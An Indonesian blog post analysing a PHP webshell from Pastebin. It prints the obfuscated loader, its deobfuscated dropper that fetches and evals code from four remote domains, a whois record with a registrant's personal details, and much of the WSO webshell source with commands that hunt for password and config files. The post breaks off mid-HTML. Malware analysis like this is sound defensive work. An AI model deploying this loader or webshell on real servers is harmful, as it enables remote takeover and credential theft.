Ini adalah tulisan singkat soal webshell yang saya temukan di pastebin. Berikut ini adalah webshell tersebut:

<?php $bidpup_reg = array('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','mlC5Cjl78BUU7Dtg==');$svtqivtd = array('base' ,'64_d' ,'ecod' ,'e'); $foy = array('gz', 'un', 'co', 'mp', 're', 'ss') ;$u_opak = 'im'.chr(112).''.chr(108).''.chr(111).''.chr(100).'e' ; $pugjf = $u_opak('', $svtqivtd); $sw_euqp = $u_opak('', $foy); eval ( $sw_euqp( $pugjf( $u_opak( '', $bidpup_reg ) ) ) ) ; ?>

Variabel $bidpup_reg berisi array berupa string yang di-encode menggunakan base64. Selanjutnya, pada bagian bawah, terdapat kode ini:

$svtqivtd = array('base' ,'64_d' ,'ecod' ,'e');
$foy = array('gz', 'un', 'co', 'mp', 're', 'ss') ;
$u_opak = 'im'.chr(112).''.chr(108).''.chr(111).''.chr(100).'e' ;
$pugjf = $u_opak('', $svtqivtd);
$sw_euqp = $u_opak('', $foy);
eval ( $sw_euqp( $pugjf( $u_opak( '', $bidpup_reg ) ) ) ) ;

Potongan kode di atas, jika di-deobfuscate, hasilnya adalah sebagai berikut:

eval(gzuncompress(base64_decode(implode('',$bidpup_reg))));

Selanjutnya, kita dapat men-deobfuscate dengan mengubah script tersebut seperti ini:

<?php $bidpup_reg = array('eNq ... ,'mlC5Cjl78BUU7Dtg==');
echo gzuncompress(base64_decode(implode('',$bidpup_reg))); ?>

Maka hasilnya adalah sebagai berikut (setelah diperbaiki formattingnya):

<?php
$xhotce = 'msu_rkuiuuyjahrzwi';
if (!function_exists('billb')) {
    function billb($i)
    {
        $a = Array('TW'.'96aWxsYS80LjA'.'gK'.'GNvbXBhdGlib'.'GU7IE1T'.'SUUg'.'OC4wOy'.'BX'.'aW'.'5k'.'b3dzI'.'E5UIDYuMCk=','TW96aWx'.'sYS'.'81Lj'.'AgKF'.'d'.'pbmRv'.'d3M7IFU7IFd'.'pb'.'mRvd3Mg'.'Tl'.'QgNS4xOyBl'.'bi1V'.'Uzsgcn'.'Y6MS'.'45'.'LjAuMS'.'k'.'gR2Vj'.'a2'.'8v'.'MjAwOD'.'A5MjIxNSB'.'GaX'.'J'.'lZm'.'94'.'LzMuMC4x','TW96aWxsYS81'.'LjA'.'gK'.'F'.'dpbmRvd3M7I'.'FU'.'7'.'IFdpb'.'mR'.'vd'.'3MgT'.'l'.'QgNS4xOyBlbi'.'1VUykgR'.'2Vja28'.'vMjA'.'wMz'.'A1MDQgTW9'.'6aWxsYSB'.'G'.'aXJlYmlyZ'.'C8wLj'.'Y=','T'.'W96aWxsY'.'S'.'81LjA'.'gKFd'.'pbmRv'.'d'.'3M7IFU7'.'IFdpb'.'m'.'Rvd3'.'M'.'gTl'.'QgNS4'.'xOy'.'Blbi'.'1VUzs'.'gcn'.'Y6'.'MS45LjIuMTApIEdl'.'Y2'.'t'.'vLz'.'Iw'.'MT'.'A'.'wO'.'T'.'E0'.'IEZpcmVm'.'b3gvMy4'.'2L'.'jEw','c'.'2Fm'.'ZV'.'9tb2Rl','b'.'3Bl'.'bl9i'.'YXNl'.'ZGly','aHR'.'0cHM6Ly8=','aHR'.'0cHM'.'6L'.'y'.'8=','aH'.'R0cDovL'.'w'.'==','','Iy8'.'j','Lw==','','','Lw==','Lw==','QW'.'NjZ'.'XB'.'0LUx'.'h'.'bm'.'d'.'1YWdlOi'.'Blbi11'.'cywgZW'.'47cT'.'0wLj'.'UwD'.'Qo=',''.'Q29ubmV'.'jdGlvbjogQ'.'2xvc2U'.'NC'.'g0'.'K','DQoN'.'Cg'.'==','Cg'.'==','PGJ'.'y'.'I'.'C8'.'+','','L0xvY'.'2'.'F0aW9'.'u'.'XD'.'ov',''.'TG'.'9jYXRpb246IA'.'='.'=',''.'D'.'Q==','DQoNCg'.'==','','JiM3NiYjMT'.'ExJi'.'M5'.'OSYjOTcmIzExNiYjMTA1JiMx'.'MT'.'EmIzE'.'xMCYjNTg=','TG9j'.'YXR'.'pb'.'246','YW'.'xs'.'b3dfdX'.'JsX2'.'ZvcGV'.'u','M'.'Q'.'==','aH'.'R0cA'.'='.'=',''.'b'.'WV0a'.'G9k','R0VU','aGVhZ'.'GVy','QWNjZXB0'.'LUx'.'hbmd1Y'.'Wd'.'lOiBlb'.'i11cyw'.'gZW47cT0wL'.'jUwDQo'.'=',''.'VXNlci1'.'B'.'Z2Vud'.'Dog',''.'DQo=','dGltZW91dA==',''.'YXV0aA==',''.'aHR0cDov'.'L25ldG5ldDQ0'.'Lm'.'5ldC9z'.'Mg==',''.'a'.'HR'.'0cDovL3Np'.'b'.'WJl'.'cnNhLm'.'NvbS9'.'zMg==','aH'.'R0cD'.'ovL'.'3d'.'l'.'YnJ'.'v'.'ZW1lci'.'5k'.'ZS9zMg==','a'.'HR0c'.'DovL29ka'.'W50YXJhLmNvbS'.'9zMg==',''.'YmFzZQ==','N'.'j'.'Q=','X2Rl','Y29'.'k','ZQ'.'='.'=');
        return base64_decode($a[$i]);
    }

    if (!function_exists('cc2')) {
        function cc2($_0,$_1 = 10)
        {
            $_2 = array(billb(0),billb(1),billb(2),billb(3));

            if (function_exists('curl_init') && function_exists('curl_exec')) {
                $_3 = $_2[rand(round(0),count($_2) - round(1))];
                $_4 = curl_init();
                curl_setopt($_4,10002,$_0);
                curl_setopt($_4,42,round(0));
                curl_setopt($_4,13,$_1);
                curl_setopt($_4,19913,round(1));
                curl_setopt($_4,10018,$_3);

                if (!(@ini_get(billb(4)) || @ini_get(billb(5)))) {
                    @curl_setopt($_4,52,round(1));
                }

                @curl_setopt($_4,68,round(3));
                @curl_setopt($_4,64,false);
                $_5 = curl_exec($_4);
                curl_close($_4);

                if ($_5 !== false) {
                    return $_5;
                }
            } else if (function_exists('fsockopen')) {
                global $_6;

                $_7 = (strpos(strtolower($_0),billb(6)) !== false) ? billb(7) : billb(8);
                $_8 = $_2[rand(round(0),count($_2) - round(1))];
                $_0 = str_replace($_7,billb(9),$_0);

                if (preg_match(billb(10),"$_0")) {
                    $_9 = $_0;
                    $_0 = @explode(billb(11),$_0);
                    $_0 = $_0[round(0)];
                    $_9 = str_replace($_0,billb(12),$_9);

                    if (!$_9 || $_9 == billb(13)) {
                        $_9 = billb(14);
                    }

                    $_10 = gethostbyname($_0);
                } else {
                    $_10 = gethostbyname($_0);
                    $_9 = billb(15);
                }

                $_11 = fsockopen($_10,round(80),$_12,$_13,$_1);
                stream_set_timeout($_11,$_1);

                if ($_11) {
                    $_14  = "GET $_9 HTTP/1.0\r\n";
                    $_14 .= "Host: $_0\r\n";
                    $_14 .= "Referer: $_7$_0$_9\r\n";
                    $_14 .= billb(16);
                    $_14 .= "User-Agent: $_8\r\n";
                    $_14 .= billb(17);fputs($_11,$_14);

                    while (!feof($_11)) {
                        $_15 .= fgets($_11,4096);
                    }

                    fclose($_11);
                    $_15 = @explode(billb(18),$_15,2);
                    $_16 = $_15[round(0)];

                    if ($_6) {
                        $_16 = "$_6<br /><br />\n$_16";
                    }

                    $_16 = str_replace(billb(19),billb(20),$_16);

                    if ($_15[round(0+1)]) {
                        $_17 = $_15[round(0+1)];
                    } else {
                        $_17 = billb(21);
                    }

                    if ($_17) {
                        $_15 = $_17;
                    } else {
                        $_15 = $_16;
                    }

                    if (preg_match(billb(22),"$_16")) {
                        $_0 = @explode(billb(23),$_16);
                        $_0 = $_0[round(0.5+0.5)];
                        $_0 = @explode(billb(24),$_0);
                        $_0 = $_0[round(0)];
                        $_6 = str_replace(billb(25),billb(26),$_16);
                        $_18 = billb(27);
                        $_6 = str_replace(billb(28),$_18,$_6);
                        return cc2($_0);
                    } else {
                        return $_15;
                    }
                }
            } else if (ini_get(billb(29)) == billb(30)) {
                $_19 = stream_context_create(array(billb(31)=> array(billb(32)=> billb(33),billb(34)=> billb(35) .billb(36) .$_8 .billb(37),billb(38)=> $_1)));
                $_5 = file_get_contents($_0,FALSE,$_19);

                if ($_5 !== false) {
                    return $_5;
                }
            } else {
                return round(0);
            }
        }
    }

    if (isset($_REQUEST[billb(39)])) {
        $_20 = array(billb(40),billb(41),billb(42),billb(43));
        shuffle($_20);

        for ($_21 = round(0); $_21 < count($_20); $_21++) {
            $_22 = billb(44) .billb(45) .billb(46) .billb(47) .billb(48);
            $_23 = cc2($_20[$_21]);

            if (strlen($_23) == round(7416+7416+7416+7416)) {
                eval($_22($_23));
                exit;
            }
        }
    }
}
?>

Bisa terlihat pada kode sumber di atas, terdapat variabel a yang berupa array dimana tiap komponennya merupakan string yang di-encode menggunakan base64. Kita dapat dengan mudah mengubah isi dari array tersebut menggunakan script berikut ini:

<?php
$a = Array('TW'.'96aWxsYS80LjA'.'gK'.'GNvbXBhdGlib'.'GU7IE1T'.'SUUg'.'OC4wOy'.'BX'.'aW'.'5k'.'b3dzI'.'E5UIDYuMCk=','TW96aWx'.'sYS'.'81Lj'.'AgKF'.'d'.'pbmRv'.'d3M7IFU7IFd'.'pb'.'mRvd3Mg'.'Tl'.'QgNS4xOyBl'.'bi1V'.'Uzsgcn'.'Y6MS'.'45'.'LjAuMS'.'k'.'gR2Vj'.'a2'.'8v'.'MjAwOD'.'A5MjIxNSB'.'GaX'.'J'.'lZm'.'94'.'LzMuMC4x','TW96aWxsYS81'.'LjA'.'gK'.'F'.'dpbmRvd3M7I'.'FU'.'7'.'IFdpb'.'mR'.'vd'.'3MgT'.'l'.'QgNS4xOyBlbi'.'1VUykgR'.'2Vja28'.'vMjA'.'wMz'.'A1MDQgTW9'.'6aWxsYSB'.'G'.'aXJlYmlyZ'.'C8wLj'.'Y=','T'.'W96aWxsY'.'S'.'81LjA'.'gKFd'.'pbmRv'.'d'.'3M7IFU7'.'IFdpb'.'m'.'Rvd3'.'M'.'gTl'.'QgNS4'.'xOy'.'Blbi'.'1VUzs'.'gcn'.'Y6'.'MS45LjIuMTApIEdl'.'Y2'.'t'.'vLz'.'Iw'.'MT'.'A'.'wO'.'T'.'E0'.'IEZpcmVm'.'b3gvMy4'.'2L'.'jEw','c'.'2Fm'.'ZV'.'9tb2Rl','b'.'3Bl'.'bl9i'.'YXNl'.'ZGly','aHR'.'0cHM6Ly8=','aHR'.'0cHM'.'6L'.'y'.'8=','aH'.'R0cDovL'.'w'.'==','','Iy8'.'j','Lw==','','','Lw==','Lw==','QW'.'NjZ'.'XB'.'0LUx'.'h'.'bm'.'d'.'1YWdlOi'.'Blbi11'.'cywgZW'.'47cT'.'0wLj'.'UwD'.'Qo=',''.'Q29ubmV'.'jdGlvbjogQ'.'2xvc2U'.'NC'.'g0'.'K','DQoN'.'Cg'.'==','Cg'.'==','PGJ'.'y'.'I'.'C8'.'+','','L0xvY'.'2'.'F0aW9'.'u'.'XD'.'ov',''.'TG'.'9jYXRpb246IA'.'='.'=',''.'D'.'Q==','DQoNCg'.'==','','JiM3NiYjMT'.'ExJi'.'M5'.'OSYjOTcmIzExNiYjMTA1JiMx'.'MT'.'EmIzE'.'xMCYjNTg=','TG9j'.'YXR'.'pb'.'246','YW'.'xs'.'b3dfdX'.'JsX2'.'ZvcGV'.'u','M'.'Q'.'==','aH'.'R0cA'.'='.'=',''.'b'.'WV0a'.'G9k','R0VU','aGVhZ'.'GVy','QWNjZXB0'.'LUx'.'hbmd1Y'.'Wd'.'lOiBlb'.'i11cyw'.'gZW47cT0wL'.'jUwDQo'.'=',''.'VXNlci1'.'B'.'Z2Vud'.'Dog',''.'DQo=','dGltZW91dA==',''.'YXV0aA==',''.'aHR0cDov'.'L25ldG5ldDQ0'.'Lm'.'5ldC9z'.'Mg==',''.'a'.'HR'.'0cDovL3Np'.'b'.'WJl'.'cnNhLm'.'NvbS9'.'zMg==','aH'.'R0cD'.'ovL'.'3d'.'l'.'YnJ'.'v'.'ZW1lci'.'5k'.'ZS9zMg==','a'.'HR0c'.'DovL29ka'.'W50YXJhLmNvbS'.'9zMg==',''.'YmFzZQ==','N'.'j'.'Q=','X2Rl','Y29'.'k','ZQ'.'='.'=');
foreach ($a as $v) { echo  base64_decode($v) . ",\n"; }
?>

Jika dijalankan, maka script di atas akan menghasilkan string berikut ini (baris kosong diabaikan):

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0),
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1,
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Gecko/20030504 Mozilla Firebird/0.6,
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10,
safe_mode,
open_basedir,
https://,
https://,
http://,
,
#/#,
/,
,
,
/,
/,
Accept-Language: en-us, en;q=0.50
,
Connection: Close
,
,
,
<br />,
,
/Location\:/,
Location: ,
,
,
,
&#76&#111&#99&#97&#116&#105&#111&#110&#58,
Location:,
allow_url_fopen,
1,
http,
method,
GET,
header,
Accept-Language: en-us, en;q=0.50
,
User-Agent: ,
,
timeout,
auth,
http://netnet44.net/s2,
http://simbersa.com/s2,
http://webroemer.de/s2,
http://odintara.com/s2,
base,
64,
_de,
cod,
e,

Bisa terlihat bahwa pada bagian akhir, terdapat sebuah tautan ke alamat http://netnet44.net/s2. Jika di-query menggunakan whois, maka informasi domain tersebut adalah sebagai berikut:

[Querying whois.verisign-grs.com]
[Redirected to whois.domaincontext.com]
[Querying whois.domaincontext.com]
[whois.domaincontext.com]
Domain Name: NETNET44.NET
Registry Domain ID: 1781139414_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.domaincontext.com
Registrar URL: www.domaincontext.com
Updated Date: 2018-02-15T09:46:18Z
Creation Date: 2013-02-18T17:34:45Z
Registrar Registration Expiration Date: 2019-02-18T17:34:45Z
Registrar: DomainContext, Inc.
Registrar IANA ID: 1111
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Jubelis Ivo
Registrant Organization:
Registrant Street: kuka 49
Registrant City: Meeksi
Registrant State/Province: Tartumaa
Registrant Postal Code: 62503
Registrant Country: EE
Registrant Phone: +372.7822569567
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: dday.rabbit@gmail.com
Registry Admin ID: Not Available From Registry
Admin Name: Jubelis Ivo
Admin Organization:
Admin Street: kuka 49
Admin City: Meeksi
Admin State/Province: Tartumaa
Admin Postal Code: 62503
Admin Country: EE
Admin Phone: +372.7822569567
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: dday.rabbit@gmail.com
Registry Tech ID: Not Available From Registry
Tech Name: Jubelis Ivo
Tech Organization:
Tech Street: kuka 49
Tech City: Meeksi
Tech State/Province: Tartumaa
Tech Postal Code: 62503
Tech Country: EE
Tech Phone: +372.7822569567
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: dday.rabbit@gmail.com
Name Server: ns1.regway.com
Name Server: ns2.regway.com
DNSSEC: Unsigned
Registrar Abuse Contact Email: tld-abuse@domaincontext.com
Registrar Abuse Contact Phone: +7 495 6459373
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-05-22T17:20:03Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

Registration Service Provided By: DOMAINCONTEXT INC.

The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is DomainContext, Inc..
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.

Ternyata registrant domain tersebut berada di Estonia. Selanjutnya, kita akan mengunduh file s2 yang terdapat pada tautan tersebut:

wget http://netnet44.net/s2

Ternyata file s2 tersebut adalah file yang di-encode menggunakan base64. Untuk men-decode, dapat digunakan dengan perintah seperti ini:

base64 -d s2 > s2-decode.php

Perintah di atas akan melakukan decode terhadap file s2 dan menyimpan hasilnya pada file s2-decode.php. Ternyata setelah di-decode, isinya masih di-encode menggunakan base64 dan dikompres menggunakan gzip. Untuk melakukan dekode dan dekompresi, ganti bagian awal eval(gzinflate(base64_decode( menjadi echo(gzinflate(base64_decode( lalu jalankan menggunakan php pada commandline. Hasilnya adalah script WSO yang merupakan webshell dan sering digunakan oleh peretas:

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("<pre align=center><form method=post><input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
        "List dir" => "ls -lha",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
        "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
        "Find" => "",
        "find all suid files" => "find / -type f -perm -04000 -ls",
        "find suid files in current dir" => "find . -type f -perm -04000 -ls",
        "find all sgid files" => "find / -type f -perm -02000 -ls",
        "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
        "find config.inc.php files" => "find / -type f -name config.inc.php",
        "find config* files" => "find / -type f -name \"config*\"",
        "find config* files in current dir" => "find . -type f -name \"config*\"",
        "find all writable folders and files" => "find / -perm -2 -ls",
        "find all writable folders and files in current dir" => "find . -perm -2 -ls",
        "find all service.pwd files" => "find / -type f -name service.pwd",
        "find service.pwd files in current dir" => "find . -type f -name service.pwd",
        "find all .htpasswd files" => "find / -type f -name .htpasswd",
        "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
        "find all .bash_history files" => "find / -type f -name .bash_history",
        "find .bash_history files in current dir" => "find . -type f -name .bash_history",
        "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
        "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
        "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );

function wsoHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = $GLOBALS['default_charset'];
    global $color;
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
    function set(a,c,p1,p2,p3,charset) {
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        d.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = 'ajax=true';
        for(i=0;i<d.mf.elements.length;i++)
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
        sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest)
            req = new XMLHttpRequest();
        else if (window.ActiveXObject)
            req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } else alert('Request error!');
    }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
